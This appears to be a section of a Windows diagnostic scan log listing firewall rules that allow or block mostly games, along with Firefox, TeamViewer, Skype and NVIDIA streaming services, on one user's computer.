FirewallRules: [TCP Query User{F88826EC-C4A7-4998-88F7-040A1DA49F26}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [UDP Query User{472ABE4E-8E97-428A-8634-C1F1221B2FC9}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [TCP Query User{A736D87A-8B4B-4C3F-A866-FC053951B367}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{4429C094-F675-4E39-8432-D6A974B313F6}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [{A31C0C9A-75B1-46E2-A560-D31AB2D27833}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{AEB337AC-F838-4B4B-8816-B72BEED7EC99}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [TCP Query User{24C29AC6-88E3-4A95-8C8F-45C5B9FE3A52}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [UDP Query User{2093AE12-66BF-4861-87C2-F3A96265073F}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{79D77E57-3EE3-4C09-B530-4B3CE5BFAE9D}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [UDP Query User{9FBEF8B5-46DC-4444-A23C-6D11B088A8F3}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [TCP Query User{F66A678C-7B64-473D-8FC8-06201AADC062}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [UDP Query User{83CBDA9A-1575-490B-AB9F-D26497F68829}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [{84873599-EC78-4B38-A255-15EBC0FC2EA4}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [{4398A2A4-113B-4DC7-BEE3-C1A06EF2761E}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [TCP Query User{919F3E59-577F-44C2-AF6C-D2415892A34F}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [UDP Query User{DB90A332-F5EA-49D2-8E43-FCC154C6F37D}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [{5356E309-436E-4CF2-8A99-9856AF496BB4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{6A61A7BD-6C5A-4910-919B-EC0FC525542A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [TCP Query User{FC0B950D-598B-4C27-A099-212AF8985044}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [UDP Query User{00E00E8D-85F0-4758-87E9-221252409F6D}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [{443644FB-CA4F-4265-80E1-2401DC456AA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{90227DFB-A226-4335-8C83-E4E636125810}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{9DB566C5-FE69-4D9B-9888-9BA9DA0FF55F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{4586C9AA-F881-469D-83C9-0740267F80EE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [TCP Query User{562D9B3F-FF37-4838-A818-95867EC2F001}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [UDP Query User{35EA472F-9B38-4741-A493-C0E2D320595F}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [TCP Query User{B1446DB0-ECE7-48AC-882B-A2749E82368B}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [UDP Query User{B91C6D26-E31D-4DEF-BADB-CD74BA9FDDA1}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [TCP Query User{7469F425-6C13-47A9-BA48-5D46998357C7}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [UDP Query User{E94231AC-F983-4BAF-94F9-E888E0ED0C22}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [TCP Query User{D8F1C82F-6331-486C-B1BA-DDA2C8C2352B}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [UDP Query User{561641AD-D5E2-4C02-8785-0EA2474ADFE1}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [{C1488CAF-3F1D-4CBE-AC47-2287B7FDD3DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{70A5D689-38BB-4673-A25F-19B5D3D737E6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{38996998-D368-4063-98C0-E06AEB44023C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{D6C44EC6-3F87-48CE-BAB8-E211A9DBC273}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{02F07D3E-F3C3-4053-9743-D91FC25BFE3D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{8164E9B5-1CD4-4DEE-973A-2044F5D60E5F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B0415D83-40EB-4823-ABD4-12D1066AB19E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{722FA4B4-31E2-4F37-AD00-61F59C03A845}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{6F83E4F5-AAA5-42DE-8F9D-FBB0BEB63EFC}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [UDP Query User{DB911C0D-75DB-45A8-86F6-9EF94D76AD42}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [TCP Query User{2351E6A2-122B-4E05-905A-88BDBF6DB57E}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [UDP Query User{A9B82257-97FF-426A-8632-55C2E5532F54}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [TCP Query User{45050945-6D3F-4D57-9CC8-FDA007D83A8B}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [UDP Query User{E7B05CD4-74AA-40C8-9E10-7961E53F21DF}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [{DC297BE2-B8D3-4C65-B87D-B63DC2C73B88}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45C1643D-955A-4777-BE45-9ABDA65D7E07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{A57A95CC-8712-4768-A828-D5C7A3C090F3}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [UDP Query User{69952427-AF52-443D-A4E1-70B140A97672}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [TCP Query User{16122460-E2CD-4566-B5DC-42712F3DE8EF}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{5ECF7D77-E9FA-477D-A7E7-D7ED39C5A5F2}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [{A8D5F529-DCD1-4FDA-BAB7-21D75192F6DA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [{F73EF0DE-71F6-4D78-A751-ADBD04752DF9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [TCP Query User{6874CB65-0F5F-487E-96D2-2E9D41C236F5}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [UDP Query User{EDC5A005-882F-439D-9609-CD03815D3841}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [{C1D9F0A3-FF2D-4386-B8A1-FC66E9C94E6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{269D0535-C251-4043-A842-DC60623DC634}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{7A779327-2587-4326-9D15-E79A2F3F055F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{8320FB98-828B-4932-9A94-21B867456F90}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [TCP Query User{9999040C-3648-45A1-8B0E-BDF1B3CA133F}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [UDP Query User{90D2846A-4BE4-4E4D-B9D1-2DDDA98866D9}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [TCP Query User{C4B6E894-1C14-4A73-AB91-825B611F1E25}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [UDP Query User{718E056C-2030-4D29-B4D8-281FF84A0063}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [TCP Query User{981E6CCF-911E-4BB6-9BDE-F9BE60F1FC49}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{9D625DCF-2803-443A-A39F-5BB8D22EE3D1}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{796658D6-38B6-4B01-BFF0-6C9766F89B8F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{026DA7C2-00A3-4743-8248-993D97678418}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{25DBFAF5-8C5E-4951-B0F2-E3444F0BA6E4}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [UDP Query User{31DB31AD-B312-4DB8-BFED-C898D6B379EA}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [{08FD0B95-B6FF-4AAE-AD20-9D98F039FF7B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{F936ABFF-170D-46EF-A8A8-9D3DC696C88F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{A19D7310-0EA2-40F7-ACC1-4F8DF0C9F7C6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{BEB0FEE9-4558-4DEF-B073-31911291551A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{9E75A985-D059-493E-84CE-E4DFAD5107DD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [{662A7F55-A717-4C86-B911-5CE3CFCF5E9F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [TCP Query User{D2AC309E-9958-42E6-B540-8EF8E661943B}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{AD605CAB-0CC7-411D-BACF-F5306499F43D}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [{21308C21-15BC-4C73-AC44-2E6EED72A984}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{E5D7FFC3-A7F6-4721-B0F8-4F35BF795C5F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{6584EECA-A2DA-45B6-BF7E-81C0C250282A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ECDAABD8-7E3F-40FB-A9CF-3C06B62FFB4C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{0919E39F-10B6-4737-A5C2-62953C825226}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{4D350746-BCCC-483E-B8E2-12CAA6A40386}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8E40FC5B-4072-47CF-8B69-8006BC435CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D08EFB35-473A-442B-A543-E08464001647}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{6B7260B7-CE43-44F8-8F83-96BA07DF356B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{E2B7627B-628F-4B51-A780-A4EB9ECACEB6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [{8C9BD548-32BF-49BB-9202-1AA981952EA0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [TCP Query User{FCC21E56-917A-448D-BC59-743E8D74F0C9}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [UDP Query User{0A5E8A79-55CB-47C8-BB0B-A12F2BC8F14C}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [TCP Query User{1B858E4D-0485-4D54-9183-AE75B20D8854}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [UDP Query User{8DD1BFC3-FE50-4431-AE63-BD0DB0817ADA}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [{64BFD6AB-8E20-4AE9-AE23-725CF5FC849A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A531C7D2-3E9E-4204-9643-7BCBB06617C8}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [UDP Query User{3D1F26BE-E928-4D9F-BFD3-391F2A07FF09}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [{F6B6969E-325A-4E1A-A90C-BEA2B1A1DAAA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76E1DBB9-EFBC-48E9-B5BA-FE535A8685E2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{E3106317-FDAA-4CD0-A39E-A660AF03548C}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [UDP Query User{64F31AA8-3C83-4940-8B7A-BB9F03D708A2}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [{9A30AC21-A19E-473C-846E-824196B9E37A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{AC88119B-D54F-4D22-A23F-FC336B5B3FE3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{F5A1B688-4DE9-4BF7-89D2-D0FE92D6CE43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{AB75E7A9-563F-4519-B6BA-128A465905E5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{D7EABB63-C0E8-418D-9792-0512F31AD004}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{1CB74876-21DE-407F-A0B2-FDE7F9F38EC9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{9B9FF0BC-4B86-405E-AB5E-6F3AA8EE9A66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [{3AFD306B-53D9-45A5-90DD-884175D2831F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [TCP Query User{11E3CD2A-BFE1-4427-BF04-4A1C75D2F196}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [UDP Query User{A69725A6-B8F4-42F0-A9BB-3100B4AC7F21}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [TCP Query User{B4E0D202-9DD8-4535-BC9F-C83BC97D092D}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [UDP Query User{C88B50F5-D440-440A-8984-9524D85A6860}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [{1B83618F-D02D-42A8-9651-26E419CD1EFD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [{DCC47D05-2539-4E99-809D-58CD3ED4EBC8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [TCP Query User{7483B01C-FD81-471A-91F3-F27FD8DED9BD}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{A1599774-927D-4906-A136-8EC9ACF6AFC7}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [{680C6942-7D40-4B01-9458-96ADE595E3AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9F7449B-0201-40D7-8E35-997E33F94A96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8FA2650D-F133-4798-AA68-FA546B43510E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{F2EF4ACE-4392-41EA-9A3D-818A9B30333A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{6B5C548F-0E30-41E6-8D48-7A162673479B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [{A5C0D7A5-9D50-4F01-8E97-27EC3563F5AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [TCP Query User{2731C65B-2AA9-4B8E-B4DA-88ACF00DBE5B}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [UDP Query User{2B62053B-324C-4636-91E9-DC9A0B7AAFF4}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [TCP Query User{A66CA3B5-9472-41C7-8BD8-CAA2E73FAD07}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{A5C11343-440F-4262-BD52-9E2F69B4F9EF}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [{9A330E71-4D27-42BC-9BC2-E5E8A8FF02CF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{2BC15E28-7E54-4572-A964-B96FC4DB517B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{568660FF-CAB1-45BA-B56E-43C90666721F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{9B05ECAE-6B44-4697-99A1-45B01D3DD64C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{76A57225-C3BD-4B04-9B9A-7A40234CAB14}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [{92128767-4267-40DA-B246-B3621A522DA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [TCP Query User{F4A54B63-A8E2-4452-8180-850077D20496}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [UDP Query User{1EB19545-AA76-4B4D-8FA0-89BC76AF3D9D}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [TCP Query User{1DB3C684-26CE-478E-B0DD-F51D8611E804}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [UDP Query User{D68A1112-A5DA-4D38-A500-B16AB85A58D8}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [TCP Query User{7A51F80D-554A-454F-9E5A-F539A4E5C285}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [UDP Query User{5D8931EF-4E7D-4C1D-9E38-AF85FB859C23}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [{6853BAB0-1C4A-4E18-B5B6-EECEF7E1DF09}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{B567282B-F73F-4CEA-BE2F-2CBE938EAB18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{492F1B4D-3B0C-4C98-B606-579059012453}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{56B6A10D-4D74-4722-BC01-33852584F8CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{B86F862D-C8D6-4C3E-B788-B5C6D93F3C1A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{E649E9B4-0ABB-490F-9692-A3E981030DF2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{FA2A2058-9CC5-4459-9D95-47A89CD852E7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{ADCF1868-E26E-4EA4-85F6-A277BB4D94D6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [TCP Query User{DA1A4364-51A0-4A13-A617-34927AD2E0B4}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [UDP Query User{53DB7273-588B-4631-B918-C1DFCF0B5364}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [{0974B5FB-67A5-4311-93C8-3E31C934201B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [{23BBB59C-4E38-4F12-ACB5-AF621E695D47}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [TCP Query User{14EF59FD-4CBE-4477-BBF6-400D49178375}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [UDP Query User{6417FD98-D5AA-4DA6-9D9A-088A5C581014}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [TCP Query User{8623F9D7-F7B7-45A6-9E24-202C5CFE17C3}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [UDP Query User{D93CC1A3-71E8-4230-9363-9E43414DAB17}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [{E9AB914A-8CDB-4D70-B686-42574EAB783E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{074E5D98-B4C1-47E6-BE65-7067C306E683}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
